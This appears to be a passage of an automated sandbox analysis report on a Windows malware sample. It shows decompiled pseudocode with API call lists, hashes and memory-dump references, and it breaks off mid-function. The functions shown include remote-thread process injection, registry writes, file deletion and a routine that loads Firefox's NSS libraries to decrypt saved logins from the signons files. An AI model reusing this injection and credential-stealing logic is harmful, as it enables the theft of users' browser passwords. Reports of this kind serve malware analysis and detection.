					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					_t40 = E00401F48(_v8);
					GetFileAttributesA(_t40);
					SetFileAttributesA(_t40, 0);
					_t24 = DeleteFileA(_t40);
					asm("sbb eax, eax");
					_v9 = _t24 + 1;
					_pop(_t37);
					 *[fs:eax] = _t37;
				}
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(E00405ACE);
				return E00401AC0( &_v8);
			}














                                    0x00405a28
                                    0x00405a29
                                    0x00405a2b
                                    0x00405a2e
                                    0x00405a31
                                    0x00405a37
                                    0x00405a3e
                                    0x00405a3f
                                    0x00405a44
                                    0x00405a47
                                    0x00405a4a
                                    0x00405a51
                                    0x00405a58
                                    0x00405a5c
                                    0x00405a5d
                                    0x00405a62
                                    0x00405a65
                                    0x00405a70
                                    0x00405a73
                                    0x00405a89
                                    0x00405a8f
                                    0x00405a97
                                    0x00405a9a
                                    0x00405a9f
                                    0x00405aa2
                                    0x00405aa2
                                    0x00405ab3
                                    0x00405ab6
                                    0x00405ab9
                                    0x00405ac6

                                    APIs
                                      • Part of subcall function 00405D04: FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                      • Part of subcall function 00405D04: FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A73
                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A89
                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A8F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesFind$CloseDeleteFirst
                                    • String ID:
                                    • API String ID: 996707796-0
                                    • Opcode ID: 407bb1a708abdd117d18c8722254ef02e451320ef10e5c65e09b9235ed18296b
                                    • Instruction ID: 1c4186debc08bb4691b9d877f2086b3288a94b326db33eea14d01e2d90e30b07
                                    • Opcode Fuzzy Hash: 407bb1a708abdd117d18c8722254ef02e451320ef10e5c65e09b9235ed18296b
                                    • Instruction Fuzzy Hash: 52110230324644AED702DB658C12A9F7BECDB0A704F6204BAF400E22D2D67D5E00DA68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405C4C, Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 70%
                                    			E00405C4C(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __esi, void* __eflags, char _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				int _t28;
				char* _t30;
				long _t34;
				intOrPtr _t49;
				void* _t52;
				void* _t55;

				_v12 = __ecx;
				_v8 = __edx;
				_t52 = __eax;
				E00401F38(_v8);
				E00401F38(_v12);
				E00401F38(_a4);
				_push(_t55);
				_push(0x405cf1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffff4;
				RegCreateKeyA(_t52, E00401F48(_v8),  &_v16); // executed
				_t28 = E00401D50(_a4);
				_t30 = E00401F48(_a4);
				_t34 = RegSetValueExA(_v16, E00401F48(_v12), 0, 2, _t30, _t28); // executed
				if(_t34 == 0) {
				}
				RegCloseKey(_v16);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(E00405CF8);
				E00401AE4( &_v12, 2);
				return E00401AC0( &_a4);
			}












                                    0x00405c54
                                    0x00405c57
                                    0x00405c5a
                                    0x00405c5f
                                    0x00405c67
                                    0x00405c6f
                                    0x00405c76
                                    0x00405c77
                                    0x00405c7c
                                    0x00405c7f
                                    0x00405c92
                                    0x00405c9a
                                    0x00405ca3
                                    0x00405cba
                                    0x00405cc1
                                    0x00405cc1
                                    0x00405cc9
                                    0x00405cd0
                                    0x00405cd3
                                    0x00405cd6
                                    0x00405ce3
                                    0x00405cf0

                                    APIs
                                    • RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 00405C92
                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CBA
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CC9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID:
                                    • API String ID: 1818849710-0
                                    • Opcode ID: 81e061f4a411acf1b47f29db2a0edd4e2ad5688a0781f21f81034fba59ec7b53
                                    • Instruction ID: 4662c72c84a21674aa9b172658a56c38b121d8aad11d412cb7a31c38f5d4d23c
                                    • Opcode Fuzzy Hash: 81e061f4a411acf1b47f29db2a0edd4e2ad5688a0781f21f81034fba59ec7b53
                                    • Instruction Fuzzy Hash: 0611DD70A14608BFDB00EFA9CC82A9E7BACDB05354F50447AF914F72E1D738AE019B58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004038AC, Relevance: 4.6, APIs: 3, Instructions: 51synchronizationthreadinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004038AC(void* __eax, void* __ecx, void* __edx, char _a4, long _a8) {
				void* _v8;
				long _v12;
				long _v16;
				void* _t16;
				void* _t23;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 = __ecx;
				_t31 = __edx;
				_t23 = __eax;
				_t33 = E0040387C(__eax, _a8, _v8);
				_t16 = CreateRemoteThread(_t23, 0, 0, E0040387C(_t23, E004037DC(__edx), _t31), _t33, 0,  &_v16); // executed
				_t32 = _t16;
				if(_a4 != 0) {
					WaitForSingleObject(_t32, 0xffffffff);
					ReadProcessMemory(_t23, _t33, _v8, _a8,  &_v12);
				}
				return _t32;
			}











                                    0x004038b5
                                    0x004038b8
                                    0x004038ba
                                    0x004038c9
                                    0x004038ea
                                    0x004038ef
                                    0x004038f5
                                    0x004038fa
                                    0x0040390d
                                    0x0040390d
                                    0x0040391a

                                    APIs
                                      • Part of subcall function 0040387C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                      • Part of subcall function 0040387C: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                    • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: MemoryProcess$AllocCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID:
                                    • API String ID: 3966641755-0
                                    • Opcode ID: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction ID: 98dfc2b63562e43be382328cbb186e20acb4a9321053857b4be2ba9adcb19dad
                                    • Opcode Fuzzy Hash: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction Fuzzy Hash: D9018F717001087BD710EA6E8C81FAFBBED8B89325F20857AB518E73C1D974DE0083A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406684, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 60%
                                    			E00406684(intOrPtr __eax, void* __ebx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				int _t55;
				intOrPtr _t70;
				intOrPtr _t83;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v8 = __eax;
				E00401F38(_v8);
				_push(_t83);
				_push(0x406794);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				if(_v8 != 0) {
					if(E00406660(_v8) != 1) {
						E00401B58( &_v12, _v8);
						if( *((char*)(_v12 + E00401D50(_v12) - 1)) != 0x5c) {
							E00401D58( &_v12, E004067AC);
						}
						while(E0040202C(E004067AC, _v12) - 1 >= 0) {
							E00401FA4(_v12, E0040202C(E004067AC, _v12), 1,  &_v20);
							E00401D58( &_v16, _v20);
							E00401FE4( &_v12, E0040202C(E004067AC, _v12), 1);
							if(E00406660(_v16) != 0) {
								continue;
							} else {
								_t55 = CreateDirectoryA(E00401F48(_v16), 0); // executed
								asm("sbb eax, eax");
								if(_t55 + 1 != 0) {
									continue;
								}
							}
							goto L9;
						}
						E00406660(_v8);
					} else {
					}
				}
				L9:
				_pop(_t70);
				 *[fs:eax] = _t70;
				_push(E0040679B);
				return E00401AE4( &_v20, 4);
			}










                                    0x00406689
                                    0x0040668a
                                    0x0040668b
                                    0x0040668c
                                    0x0040668e
                                    0x00406694
                                    0x0040669b
                                    0x0040669c
                                    0x004066a1
                                    0x004066a4
                                    0x004066ad
                                    0x004066bd
                                    0x004066cc
                                    0x004066e1
                                    0x004066eb
                                    0x004066eb
                                    0x0040675f
                                    0x0040670d
                                    0x00406718
                                    0x00406734
                                    0x00406743
                                    0x00000000
                                    0x00406745
                                    0x00406750
                                    0x00406758
                                    0x0040675d
                                    0x00000000
                                    0x00000000
                                    0x0040675d
                                    0x00000000
                                    0x00406743
                                    0x00406772
                                    0x004066bf
                                    0x004066bf
                                    0x004066bd
                                    0x00406779
                                    0x0040677b
                                    0x0040677e
                                    0x00406781
                                    0x00406793

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: c9e28d2c4a69e1a92fb4bc546c22ddd89a9891bb3f9ee0742535c6a6392ef30c
                                    • Instruction ID: 08c8d177f09d8c487563988da865974fd2a5e1b789b45069e99321bb8cea4358
                                    • Opcode Fuzzy Hash: c9e28d2c4a69e1a92fb4bc546c22ddd89a9891bb3f9ee0742535c6a6392ef30c
                                    • Instruction Fuzzy Hash: 76315030A00208AFDB00EBA5C942E9E77B5EF44308F6141BBF102B72E1D77DAE558A58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406660, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00406660(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E00401F48(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                    0x0040666b
                                    0x00406673
                                    0x0040667c
                                    0x0040667d
                                    0x00406680
                                    0x00406680

                                    APIs
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,004066BB,00000000,00406794,?,?,00000000,00000000,00000000,00000000), ref: 0040666B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 232d6052807dbe3ee739838454242664567a35a431450d985541483414e2e397
                                    • Instruction ID: fca0ec8dcb75db4ffbb1fbdbb764ae01d2ede40a2229cdd6f6647931c02f8f91
                                    • Opcode Fuzzy Hash: 232d6052807dbe3ee739838454242664567a35a431450d985541483414e2e397
                                    • Instruction Fuzzy Hash: B8C08CE02012000ADE10A9FE0CC1A1A02C80E1437AB602F7BF039F33E2E27F88322028
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403566, Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E00403566(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                    0x0040356b
                                    0x00403573
                                    0x0040357e
                                    0x00403584

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction ID: 72f15282d468185fbe7a0b5f937441395a77a4796b686d6b9836a445fb31a29c
                                    • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction Fuzzy Hash: 6ED0127325024CBFC700EEBDCC05DAB33DC9718609B008425B918C7100D139EA508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403568, Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E00403568(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                    0x0040356b
                                    0x00403573
                                    0x0040357e
                                    0x00403584

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction ID: b1e9c139d53b74868f197cdea1108a814add3867d20bcc7908f8201953e61f5a
                                    • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction Fuzzy Hash: 0FC0127315024CABC700EEBDCC05D9B33DC5718609B008425B518C7100D139E6508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040115D, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlReAllocateHeap.NTDLL(00730000,00000000), ref: 0040116D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction ID: de04998b76c7b9bc537c8d7dd9716f6d6fbeb3d3f43a7f0598963b3529812e59
                                    • Opcode Fuzzy Hash: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction Fuzzy Hash: 08B092B2500100AAD740D799DD42F4222ACA30C348F840C647248F31A1D13CA420472C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401122, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00401122(long __eax) {
				long _t2;
				void* _t3;
				void* _t4;

				_t2 =  *0x40d03c; // 0x0
				_t3 =  *0x40e590; // 0x730000
				_t4 = RtlAllocateHeap(_t3, _t2, __eax); // executed
				return _t4;
			}






                                    0x00401125
                                    0x0040112b
                                    0x00401131
                                    0x00401136

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00730000,00000000), ref: 00401131
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction ID: c8d19fe016ae2e0651702f7a29d851e7a2fc058706c9609f530dee1e772ded5c
                                    • Opcode Fuzzy Hash: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction Fuzzy Hash: 65B092A5A00000AFE640E7ED9E40E2223ECA70C2083800C247208E3162E13898104728
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401139, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • HeapFree.KERNEL32(00730000,00000000), ref: 0040114B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction ID: 0196c5bfe9261146ad4c3cc9aab034bd4c3b0778a6c2e215fe72248fa00cbfe1
                                    • Opcode Fuzzy Hash: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction Fuzzy Hash: 47C08CB3220101ABDB0087E9DDC2D6622ECB208208B140C21F908EB061E13EC8A40228
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 00409EF8, Relevance: 125.1, APIs: 40, Strings: 31, Instructions: 838libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 59%
                                    			E00409EF8(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				struct HINSTANCE__* _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				_Unknown_base(*)()* _v24;
				_Unknown_base(*)()* _v28;
				struct HINSTANCE__* _v32;
				_Unknown_base(*)()* _v36;
				void* _v40;
				void* _v44;
				long _v48;
				void* _v52;
				char _v56;
				long _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				char _v92;
				struct HINSTANCE__** _v96;
				char _v357;
				char _v369;
				intOrPtr _v373;
				intOrPtr _v377;
				char _v381;
				struct HINSTANCE__* _v388;
				struct HINSTANCE__* _v392;
				struct HINSTANCE__* _v396;
				struct HINSTANCE__* _v400;
				struct HINSTANCE__* _v404;
				struct HINSTANCE__* _v408;
				char _v412;
				char _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				char _v456;
				char _v460;
				intOrPtr _v464;
				char _v468;
				char _v472;
				intOrPtr _v476;
				char _v480;
				char _v484;
				char _v488;
				intOrPtr _v492;
				char _v496;
				char _v500;
				intOrPtr _v504;
				char _v508;
				char _v512;
				char _v516;
				intOrPtr _v520;
				char _v524;
				char _v528;
				intOrPtr _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr _v548;
				char _v552;
				char _v556;
				intOrPtr _v560;
				char _v564;
				char _v568;
				intOrPtr _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				CHAR* _t405;
				intOrPtr _t433;
				intOrPtr _t466;
				intOrPtr _t470;
				intOrPtr _t491;
				intOrPtr _t518;
				intOrPtr _t524;
				intOrPtr _t526;
				intOrPtr* _t625;
				void* _t626;
				intOrPtr _t701;
				intOrPtr _t719;
				intOrPtr _t744;
				intOrPtr _t745;
				intOrPtr _t746;
				intOrPtr _t747;
				intOrPtr _t748;
				intOrPtr _t749;
				intOrPtr _t750;
				intOrPtr* _t753;
				intOrPtr* _t754;
				intOrPtr* _t755;
				intOrPtr* _t756;
				_Unknown_base(*)()* _t759;
				intOrPtr* _t760;
				intOrPtr _t762;
				intOrPtr _t763;

				_t762 = _t763;
				_t626 = 0x49;
				do {
					_push(0);
					_push(0);
					_t626 = _t626 - 1;
				} while (_t626 != 0);
				_push(_t626);
				_push(__ebx);
				_t625 = __eax;
				_push(_t762);
				_push(0x40aba5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t763;
				_t766 =  *0x40f1d4;
				if( *0x40f1d4 == 0) {
					E004061DC( &_v416, __eax, 0x40f1d4, _t766);
					E00401B14(0x40f1d4, _v416);
				}
				E00401B14(_t625, 0x40abbc);
				E00401AC0( &_v84);
				_push( *0x40f1d4);
				_push("\\Mozilla Firefox\\");
				_push("mozcrt19.dll");
				E00401E10();
				_v412 = LoadLibraryA(E00401F48(_v420));
				_push( *0x40f1d4);
				_push("\\Mozilla Firefox\\");
				_push("sqlite3.dll");
				E00401E10();
				_v408 = LoadLibraryA(E00401F48(_v424));
				_push( *0x40f1d4);
				_push("\\Mozilla Firefox\\");
				_push("nspr4.dll");
				E00401E10();
				_v404 = LoadLibraryA(E00401F48(_v428));
				_push( *0x40f1d4);
				_push("\\Mozilla Firefox\\");
				_push("plc4.dll");
				E00401E10();
				_v400 = LoadLibraryA(E00401F48(_v432));
				_push( *0x40f1d4);
				_push("\\Mozilla Firefox\\");
				_push("plds4.dll");
				E00401E10();
				_v396 = LoadLibraryA(E00401F48(_v436));
				_push( *0x40f1d4);
				_push("\\Mozilla Firefox\\");
				_push("nssutil3.dll");
				E00401E10();
				_v392 = LoadLibraryA(E00401F48(_v440));
				_push( *0x40f1d4);
				_push("\\Mozilla Firefox\\");
				_push("softokn3.dll");
				E00401E10();
				_v388 = LoadLibraryA(E00401F48(_v444));
				_push( *0x40f1d4);
				_push("\\Mozilla Firefox\\");
				_push("nss3.dll");
				E00401E10();
				_v8 = LoadLibraryA(E00401F48(_v448));
				_t759 = GetProcAddress(_v8, "NSS_Init");
				_v12 = _t759;
				if(_t759 != 0) {
					_t753 = GetProcAddress(_v8, "NSSBase64_DecodeBuffer");
					_t760 = _t753;
					__eflags = _t753;
					if(_t753 != 0) {
						_t754 = GetProcAddress(_v8, "PK11_GetInternalKeySlot");
						_v16 = _t754;
						__eflags = _t754;
						if(_t754 != 0) {
							_t755 = GetProcAddress(_v8, "PK11_Authenticate");
							_v20 = _t755;
							__eflags = _t755;
							if(_t755 != 0) {
								_t756 = GetProcAddress(_v8, "PK11SDR_Decrypt");
								__eflags = _t756;
								if(_t756 != 0) {
									_v24 = GetProcAddress(_v8, "NSS_Shutdown");
									__eflags = _v24;
									if(_v24 != 0) {
										_v28 = GetProcAddress(_v8, "PK11_FreeSlot");
										__eflags = _v28;
										if(__eflags != 0) {
											_v32 = LoadLibraryA("userenv.dll");
											_v36 = GetProcAddress(_v32, "GetUserProfileDirectoryA");
											OpenProcessToken(GetCurrentProcess(), 8,  &_v40);
											E00405BEC( &_v456, _t625, _t760, __eflags);
											_push(_v456);
											_push("\\Mozilla\\Firefox\\");
											_push("profiles.ini");
											E00401E10();
											GetPrivateProfileStringA("Profile0", "Path", 0x40ad64,  &_v357, 0x104, E00401F48(_v452));
											E00405BEC( &_v468, _t625, _t760, __eflags);
											_push(_v468);
											_push("\\Mozilla\\Firefox\\");
											E00401D24( &_v472, 0x105,  &_v357);
											_push(_v472);
											_push("\\signons3.txt");
											E00401E10();
											E00401CAC( &_v460, E00401F48(_v464));
											__eflags = E00405D04(_v460, _t625, __eflags) - 1;
											if(__eflags != 0) {
												E00405BEC( &_v496, _t625, _t760, __eflags);
												_push(_v496);
												_push("\\Mozilla\\Firefox\\");
												E00401D24( &_v500, 0x105,  &_v357);
												_push(_v500);
												_push("\\signons2.txt");
												E00401E10();
												E00401CAC( &_v488, E00401F48(_v492));
												__eflags = E00405D04(_v488, _t625, __eflags) - 1;
												if(__eflags != 0) {
													E00405BEC( &_v524, _t625, _t760, __eflags);
													_push(_v524);
													_push("\\Mozilla\\Firefox\\");
													E00401D24( &_v528, 0x105,  &_v357);
													_push(_v528);
													_push("\\signons1.txt");
													E00401E10();
													E00401CAC( &_v516, E00401F48(_v520));
													__eflags = E00405D04(_v516, _t625, __eflags) - 1;
													if(__eflags != 0) {
														E00405BEC( &_v552, _t625, _t760, __eflags);
														_push(_v552);
														_push("\\Mozilla\\Firefox\\");
														E00401D24( &_v556, 0x105,  &_v357);
														_push(_v556);
														_push("\\signons.txt");
														E00401E10();
														E00401CAC( &_v544, E00401F48(_v548));
														__eflags = E00405D04(_v544, _t625, __eflags) - 1;
														if(__eflags != 0) {
															E00401AC0(_t625);
														} else {
															E00405BEC( &_v564, _t625, _t760, __eflags);
															_push(_v564);
															_push("\\Mozilla\\Firefox\\");
															E00401D24( &_v568, 0x105,  &_v357);
															_push(_v568);
															_push("\\signons.txt");
															E00401E10();
															_t405 = E00401F48(_v560);
															goto L48;
														}
													} else {
														E00405BEC( &_v536, _t625, _t760, __eflags);
														_push(_v536);
